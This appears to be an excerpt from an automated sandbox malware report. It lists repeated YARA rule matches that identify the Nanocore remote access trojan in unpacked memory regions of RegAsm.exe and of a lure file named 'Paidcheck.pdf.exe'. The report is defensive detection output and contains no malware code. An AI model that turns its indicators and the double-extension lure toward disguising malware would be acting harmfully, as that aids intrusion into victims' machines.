      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
